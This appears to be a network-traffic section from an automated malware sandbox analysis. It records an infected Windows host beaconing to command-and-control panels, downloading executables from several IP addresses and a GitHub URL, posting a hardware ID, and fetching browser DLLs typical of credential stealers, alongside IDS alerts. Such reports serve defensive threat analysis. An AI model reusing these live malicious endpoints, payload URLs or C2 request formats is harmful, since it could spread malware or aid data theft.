                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                              Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 36 33 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017631001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 36 33 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017632001&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIIIJKFCAAECAKFIEHCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 46 30 33 43 33 42 42 32 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 2d 2d 0d 0a Data Ascii: ------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="hwid"C1F03C3BB2381806970752------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="build"stok------FIIIIJKFCAAECAKFIEHC--
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                              Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHJKFHJJJKJJJJKEHCBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 46 30 33 43 33 42 42 32 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 2d 2d 0d 0a Data Ascii: ------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="hwid"C1F03C3BB2381806970752------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="build"stok------EGHJKFHJJJKJJJJKEHCB--
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 36 33 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017633001&unit=246122658369
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49737 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49762 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49767 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49773 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49772 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49765 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49775 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49779 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49780 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49797 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49803 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49813 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49834 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49854 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49862 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49902 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49899 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49928 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49907 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49908 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49935 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49921 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49919 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49937 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49947 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49841 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49872 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49957 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49968 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50076 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50205 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50206 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50208 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50209 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50210 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50211 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50212 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50215 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50218 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50217 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50219 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50223 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50222 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50221 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50224 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50225 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50227 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50229 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50235 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50255 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50254 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50260 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50264 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50265 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50267 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50269 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50271 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50273 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50277 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50276 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50280 -> 185.215.113.16:80
                              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_006BE0C0 recv,recv,recv,recv,3_2_006BE0C0
                              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/raw/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /files/geopoxid/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/wicked/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /hLfzXsaqNtoEGyaUtOMJ1734514745?argument=bUbC3wV0kP2YsIRM1734614448 HTTP/1.1Host: home.fivetk5vt.topAccept: */*
                              Source: global trafficHTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
